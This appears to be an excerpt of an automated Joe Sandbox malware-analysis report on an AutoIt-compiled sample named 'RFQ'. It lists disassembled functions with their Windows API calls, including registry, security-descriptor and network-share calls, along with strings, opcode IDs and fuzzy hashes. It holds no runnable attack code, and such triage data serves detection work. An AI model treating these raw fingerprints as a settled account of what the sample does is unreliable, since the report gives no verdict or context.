                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0078076F
                                                                                                                                                    • _wcscat.LIBCMT ref: 00780787
                                                                                                                                                    • _wcscat.LIBCMT ref: 00780799
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007807AE
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007807C2
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 007807DA
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 007807F4
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00780806
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 34673085-438819550
                                                                                                                                                    • Opcode ID: 9166df20f9da985680fc096d0697c9638c6cd5b8ba5d474b215b13cdea0228e9
                                                                                                                                                    • Instruction ID: 6d64483d71fcf3f079dfd96e89ff17fbb11872de08d9474ac75099af5a0a4a14
                                                                                                                                                    • Opcode Fuzzy Hash: 9166df20f9da985680fc096d0697c9638c6cd5b8ba5d474b215b13cdea0228e9
                                                                                                                                                    • Instruction Fuzzy Hash: 85819171644301DFCBA4EF24C8459AEB3E8BF88304F14882EF885D7251E739E9598BD2
                                                                                                                                                    Function 0079EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0079EF3B
                                                                                                                                                    • GetFocus.USER32 ref: 0079EF4B
                                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0079EF56
                                                                                                                                                    • _memset.LIBCMT ref: 0079F081
                                                                                                                                                    • GetMenuItemInfoW.USER32 ref: 0079F0AC
                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 0079F0CC
                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0079F0DF
                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0079F113
                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0079F15B
                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0079F193
                                                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0079F1C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1296962147-4108050209
                                                                                                                                                    • Opcode ID: 5c74f19ae578295d26f2cda9a852375fc9ae8a4f4065b87ab139e4aed5eb3ae7
                                                                                                                                                    • Instruction ID: 1a9f960e5e565535767e2632217ae50c0792a4fd1f192c3d7b0840acbfdb6bbf
                                                                                                                                                    • Opcode Fuzzy Hash: 5c74f19ae578295d26f2cda9a852375fc9ae8a4f4065b87ab139e4aed5eb3ae7
                                                                                                                                                    • Instruction Fuzzy Hash: AE815A71604305EFDB20CF15E884A6ABBE9FB88314F10492EF999D7291D778D905CB92
                                                                                                                                                    Function 0076A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0076ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0076ABD7
                                                                                                                                                      • Part of subcall function 0076ABBB: GetLastError.KERNEL32(?,0076A69F,?,?,?), ref: 0076ABE1
                                                                                                                                                      • Part of subcall function 0076ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0076A69F,?,?,?), ref: 0076ABF0
                                                                                                                                                      • Part of subcall function 0076ABBB: HeapAlloc.KERNEL32(00000000,?,0076A69F,?,?,?), ref: 0076ABF7
                                                                                                                                                      • Part of subcall function 0076ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0076AC0E
                                                                                                                                                      • Part of subcall function 0076AC56: GetProcessHeap.KERNEL32(00000008,0076A6B5,00000000,00000000,?,0076A6B5,?), ref: 0076AC62
                                                                                                                                                      • Part of subcall function 0076AC56: HeapAlloc.KERNEL32(00000000,?,0076A6B5,?), ref: 0076AC69
                                                                                                                                                      • Part of subcall function 0076AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0076A6B5,?), ref: 0076AC7A
                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0076A8CB
                                                                                                                                                    • _memset.LIBCMT ref: 0076A8E0
                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0076A8FF
                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0076A910
                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0076A94D
                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0076A969
                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0076A986
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0076A995
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0076A99C
                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0076A9BD
                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 0076A9C4
                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0076A9F5
                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0076AA1B
                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0076AA2F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3996160137-0
                                                                                                                                                    • Opcode ID: ba32e9a718886843eb1dfa2364ccfc5d25d897c18d43115034e9c047a8de63ca
                                                                                                                                                    • Instruction ID: 5cf4610ad8e13c37687badcc4952cc43c69dd1f00765e52a9059acb95afcad74
                                                                                                                                                    • Opcode Fuzzy Hash: ba32e9a718886843eb1dfa2364ccfc5d25d897c18d43115034e9c047a8de63ca
                                                                                                                                                    • Instruction Fuzzy Hash: EA511CB1900209BBDF14DF94DD85EEEBB79FF04304F14822AE916E6291EB399905CF61
                                                                                                                                                    Function 0077CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadString__swprintf_wprintf
                                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                    • API String ID: 2889450990-2391861430
                                                                                                                                                    • Opcode ID: 3a21cb9793fb155c044d1c17e92cc554151ea5ece6c77de52aa88ab6353a39d6
                                                                                                                                                    • Instruction ID: 375ed8befdc7c36327c914d895eb08452f36747faca51fcbfa2b475f2c3d3dcc
                                                                                                                                                    • Opcode Fuzzy Hash: 3a21cb9793fb155c044d1c17e92cc554151ea5ece6c77de52aa88ab6353a39d6
                                                                                                                                                    • Instruction Fuzzy Hash: 2D516D71900109FADF25EBA0CD4AEEEB778AF08344F108169F505720A2EB796F59DB61
                                                                                                                                                    Function 0077CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadString__swprintf_wprintf
                                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                    • API String ID: 2889450990-3420473620
                                                                                                                                                    • Opcode ID: f3f79f6f71463c5feaea493bb50289fa5a75190bdb0d37133d18ae2959898af2
                                                                                                                                                    • Instruction ID: 116bcf18159ff0c6cce5a0cab85d89092c47f34cee74704bba3468b4ed5a6e01
                                                                                                                                                    • Opcode Fuzzy Hash: f3f79f6f71463c5feaea493bb50289fa5a75190bdb0d37133d18ae2959898af2
                                                                                                                                                    • Instruction Fuzzy Hash: C1518071900109FADF16EBE0DD4AEEEB778AF08340F504069B50972062EB796F59DF61
                                                                                                                                                    Function 00793C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00792BB5,?,?), ref: 00793C1D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                                    • String ID: $E~$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                    • API String ID: 3964851224-1783115620
                                                                                                                                                    • Opcode ID: d3de235dbcc7a37b9f8657dcc353c2fb38eb6814cf38927f2706b5092999defd
                                                                                                                                                    • Instruction ID: c829283437ba7f7f2caeeeaa71a51057bad948ad6e83f5657a83aa7afbafafde
                                                                                                                                                    • Opcode Fuzzy Hash: d3de235dbcc7a37b9f8657dcc353c2fb38eb6814cf38927f2706b5092999defd
                                                                                                                                                    • Instruction Fuzzy Hash: 6141833060028ACBDF10EF11E895AEB3365FF16354F104465FC555B296EB7CAE1ACB60
                                                                                                                                                    Function 007755BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 007755D7
                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00775664
                                                                                                                                                    • GetMenuItemCount.USER32(007F1708), ref: 007756ED
                                                                                                                                                    • DeleteMenu.USER32(007F1708,00000005,00000000,000000F5,?,?), ref: 0077577D
                                                                                                                                                    • DeleteMenu.USER32(007F1708,00000004,00000000), ref: 00775785
                                                                                                                                                    • DeleteMenu.USER32(007F1708,00000006,00000000), ref: 0077578D
                                                                                                                                                    • DeleteMenu.USER32(007F1708,00000003,00000000), ref: 00775795
                                                                                                                                                    • GetMenuItemCount.USER32(007F1708), ref: 0077579D
                                                                                                                                                    • SetMenuItemInfoW.USER32(007F1708,00000004,00000000,00000030), ref: 007757D3
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 007757DD
                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 007757E6
                                                                                                                                                    • TrackPopupMenuEx.USER32(007F1708,00000000,?,00000000,00000000,00000000), ref: 007757F9
                                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00775805
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3993528054-0
                                                                                                                                                    • Opcode ID: c66ddd3f385fb5362a7e1466cb6cd951d9bcd3469418d067124fca778d7d54b5
                                                                                                                                                    • Instruction ID: 3e370395d9e8ebe23f702008d922375c535c9f85f14edf22684f3884cebd6057
                                                                                                                                                    • Opcode Fuzzy Hash: c66ddd3f385fb5362a7e1466cb6cd951d9bcd3469418d067124fca778d7d54b5
                                                                                                                                                    • Instruction Fuzzy Hash: 1C71D170640605FEEF249B54CC49FAABF65FF017A8F248219F51CAA1D1C7B96C20DBA4
                                                                                                                                                    Function 0076A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0076A1DC
                                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0076A211
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0076A22D
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0076A249
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0076A273
                                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0076A29B
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0076A2A6
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0076A2AB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                    • API String ID: 1687751970-22481851
                                                                                                                                                    • Opcode ID: 01577e713feca3d2d2c219f2cabbdadf1b43d06bf2fd0b4be92a4f4aad0c3cf0
                                                                                                                                                    • Instruction ID: 0431541f790b86cfff271e2092de8321107a3cca0a076aa12862b28289b50028
                                                                                                                                                    • Opcode Fuzzy Hash: 01577e713feca3d2d2c219f2cabbdadf1b43d06bf2fd0b4be92a4f4aad0c3cf0
                                                                                                                                                    • Instruction Fuzzy Hash: 7D41C576C1122DABDB25EBA4DC95DEDB7B8BF08710F004129E902B3162EB799E05CF51
                                                                                                                                                    Function 007767E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __swprintf.LIBCMT ref: 007767FD
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077680A
                                                                                                                                                      • Part of subcall function 0075172B: __woutput_l.LIBCMT ref: 00751784
                                                                                                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00776834
                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00776840
                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0077684D
                                                                                                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0077686D
                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0077687F
                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0077688E
                                                                                                                                                    • LockResource.KERNEL32(?), ref: 0077689A
                                                                                                                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007768F9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                    • String ID: 5~
                                                                                                                                                    • API String ID: 1433390588-4055697937
                                                                                                                                                    • Opcode ID: fa77c62e1666f29a0c98b4abb503c8eb91b4fd69cb849bc8b0f865687fc86699
                                                                                                                                                    • Instruction ID: f64ed1511985ff169c185bf6f710374d7d87272ac8baba21e20afb57fcb385eb
                                                                                                                                                    • Opcode Fuzzy Hash: fa77c62e1666f29a0c98b4abb503c8eb91b4fd69cb849bc8b0f865687fc86699
                                                                                                                                                    • Instruction Fuzzy Hash: B931AE7190065AABDF109F61DD88EFA7BA8FF08381F00C525F916E2140E738DD21DBA5
                                                                                                                                                    Function 007725B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007A36F4,00000010,?,Bad directive syntax error,007CDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 007725D6
                                                                                                                                                    • LoadStringW.USER32(00000000,?,007A36F4,00000010), ref: 007725DD
                                                                                                                                                    • _wprintf.LIBCMT ref: 00772610
                                                                                                                                                    • __swprintf.LIBCMT ref: 00772632
                                                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007726A1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                    • API String ID: 1080873982-4153970271
                                                                                                                                                    • Opcode ID: 48d5cdec28a31005290ca1779327ab5f04135d2b8c711aa4e82e25b886be8164
                                                                                                                                                    • Instruction ID: 5a652780357587d4d7209fce02d711f8e256b2c026b86586e5269a72c0cd4d68
                                                                                                                                                    • Opcode Fuzzy Hash: 48d5cdec28a31005290ca1779327ab5f04135d2b8c711aa4e82e25b886be8164
                                                                                                                                                    • Instruction Fuzzy Hash: 35217C7190021EEFDF12AB90CC4EFEE7B78BF18304F004456F515620A3EA79AA29DB51
                                                                                                                                                    Function 00777AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00777B42
                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00777B58
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00777B69
                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00777B7B
                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00777B8C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SendString
                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                    • API String ID: 890592661-1007645807
                                                                                                                                                    • Opcode ID: 34366ecbf2d7c9bbd8bbef9239ea4b39cd8027b3ddc748f2099095984a3cfbc6
                                                                                                                                                    • Instruction ID: 71b4ee87b3969b492fa7049670ef266261329dbed11b23d1b9569753cd9794a6
                                                                                                                                                    • Opcode Fuzzy Hash: 34366ecbf2d7c9bbd8bbef9239ea4b39cd8027b3ddc748f2099095984a3cfbc6
                                                                                                                                                    • Instruction Fuzzy Hash: 4E11C8E0641299B9E724B362CC8EDFF7B7CEB95B40F0004297415A30D1DE780E44C6B0
                                                                                                                                                    Function 0077778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • timeGetTime.WINMM ref: 00777794
                                                                                                                                                      • Part of subcall function 0074DC38: timeGetTime.WINMM(?,75A8B400,007A58AB), ref: 0074DC3C
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 007777C0
                                                                                                                                                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 007777E4
                                                                                                                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00777806
                                                                                                                                                    • SetActiveWindow.USER32 ref: 00777825
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00777833
                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00777852
